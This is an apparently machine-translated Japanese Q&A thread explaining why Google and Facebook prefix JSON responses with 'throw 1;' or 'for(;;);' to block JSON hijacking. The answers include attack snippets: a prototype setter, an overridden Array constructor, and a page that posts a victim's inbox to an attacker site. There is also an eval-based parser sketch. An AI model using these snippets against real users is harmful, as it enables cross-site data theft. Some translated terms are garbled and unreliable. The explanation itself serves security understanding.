なぜ人々は「1を投げる; <邪悪になるな>」と「for（;;）;」jsonの応答の前に？[複製]

重複の可能性：
Googleがwhile（1）を付加するのはなぜですか。彼らのJSON応答に？

Googleは次のようにjsonを返します：

throw 1; <dont be evil> { foo: bar}

Facebookのajaxには次のようなjsonがあります。

for(;;); {"error":0,"errorSummary": ""}

• なぜ彼らは実行を停止して無効なjsonを作るコードを置くのですか？
• それが無効である場合、彼らはそれをどのように解析し、あなたがそれを評価しようとするとクラッシュするでしょうか？
• 彼らはそれを文字列から削除するだけですか（高価なようです）？
• これにはセキュリティ上の利点はありますか？

それがセキュリティ目的であることに応じて：

スクレーパーが別のドメインにscriptある場合、XHRはクロスドメインで機能しないため、データを取得するためにタグを使用する必要があります。for(;;);攻撃者はどのようにしてデータを取得するのでしょうか。変数に割り当てられていないので、参照がないためにガベージコレクションされるだけではないでしょうか。

基本的に、データをクロスドメインで取得するには、彼らがしなければならないでしょう

<script src="http://target.com/json.js"></script>

ただし、クラッシュスクリプトが付加されていなくても、攻撃者は、グローバルにアクセスできる変数に割り当てられていない限り、Jsonデータを使用できません（これらの場合はそうではありません）。クラッシュコードがなくても、サイトのデータを使用するにはサーバーサイドスクリプトを使用する必要があるため、クラッシュコードは事実上何もしません。

for(;;);攻撃者はどのようにしてデータを取得するのでしょうか。

攻撃は、コンストラクター関数またはその。を変更することにより、組み込み型、特にObjectおよびの動作を変更することに基づいてArrayいprototypeます。次に、ターゲットのJSONが{...}または[...]コンストラクトを使用する場合、それらは攻撃者自身のバージョンのオブジェクトになり、予期しない動作が発生する可能性があります。

たとえば、setter-propertyをにハックしてObject、オブジェクトリテラルに記述された値を裏切ることができます。

Object.prototype.__defineSetter__('x', function(x) {
    alert('Ha! I steal '+x);
});

次に、<script>そのプロパティ名を使用するJSONがaにポイントされた場合：

{"x": "hello"}

値"hello"がリークされます。

配列リテラルとオブジェクトリテラルがセッターを呼び出す方法については議論の余地があります。Firefoxは、有名なWebサイトへの攻撃が公表されたことに対応して、バージョン3.5でこの動作を削除しました。ただし、執筆時点では、Safari（4）とChrome（5）は依然としてこれに対して脆弱です。

現在すべてのブラウザーで許可されていないもう1つの攻撃は、コンストラクター関数を再定義することでした。

Array= function() {
    alert('I steal '+this);
};

[1, 2, 3]

そして今のところ、IE8のプロパティの実装（ECMAScript Fifth Edition標準およびに基づくObject.defineProperty）は現在、Object.prototypeまたはで機能しませんArray.prototype。

しかし、過去のブラウザを保護するだけでなく、JavaScriptの拡張機能が将来、同様の種類のリークを引き起こす可能性があります。その場合、籾殻はそれらからも保護する必要があります。

Gmailアカウントを確認した後、私の邪悪なページにアクセスすることを検討してください。

<script type="text/javascript">
Object = function() {
  ajaxRequestToMyEvilSite(JSON.serialize(this));
}
</script>
<script type="text/javascript" src="http://gmail.com/inbox/listMessage"></script>

これから起こることは、グーグルから来たJavascriptコード（質問者は無害ですぐに範囲外になると思っていた）が実際に私の邪悪なサイトに投稿されるということです。スクリプトタグで要求されたURLが送信するとします（ブラウザが適切なCookieを提示するため、Googleはユーザーが受信トレイにログインしていると正しく認識します）。

({
  messages: [
    {
      id: 1,
      subject: 'Super confidential information',
      message: 'Please keep this to yourself: the password is 42'
    },{
      id: 2,
      subject: 'Who stole your password?',
      message: 'Someone knows your password! I told you to keep this information to yourself! And by this information I mean: the password is 42'
    }
  ]
})

今、私はこのオブジェクトのシリアル化されたバージョンを私の邪悪なサーバーに投稿します。ありがとうございました！

これを防ぐ方法は、JSON応答を削除し、同じドメインからそのデータを操作できるときにそれらを削除することです。この回答が気に入った場合は、bobinceによって投稿された回答を受け入れてください。

編集

これらの文字列は一般に「解析不可能なクロフト」と呼ばれ、JSON仕様に影響を与える情報漏えいの脆弱性にパッチを適用するために使用されます。この攻撃は現実の世界であり、Gmailの脆弱性がJeremiahGrossmanによって発見されました。Mozillaはまた、これがJSON仕様の脆弱性であると考えており、Firefox3でパッチが適用されています。ただし、この問題は他のブラウザにも影響を与えるため、互換性のあるパッチであるため、この「解析不可能な問題」が必要です。

ボビスの答えには、この攻撃の技術的な説明があり、それは正しいです。

それが無効である場合、彼らはそれをどのように解析し、あなたがそれを評価しようとするとクラッシュするでしょうか？

試してみるとクラッシュする機能ですeval。evalクロスサイトスクリプティング攻撃に使用される可能性のある任意のJavaScriptコードを許可します。

彼らはそれを文字列から削除するだけですか（高価なようです）？

そう思います。おそらく次のようなものです：

function parseJson(json) {
   json = json.replace("throw 1; <dont be evil>", "");
   if (/* regex to validate the JSON */) {
       return eval(json);
   } else {
       throw "XSS";
   }
}

「邪悪になるな」の雑用は、開発者evalがより安全な代替手段の代わりに直接使用することを防ぎます。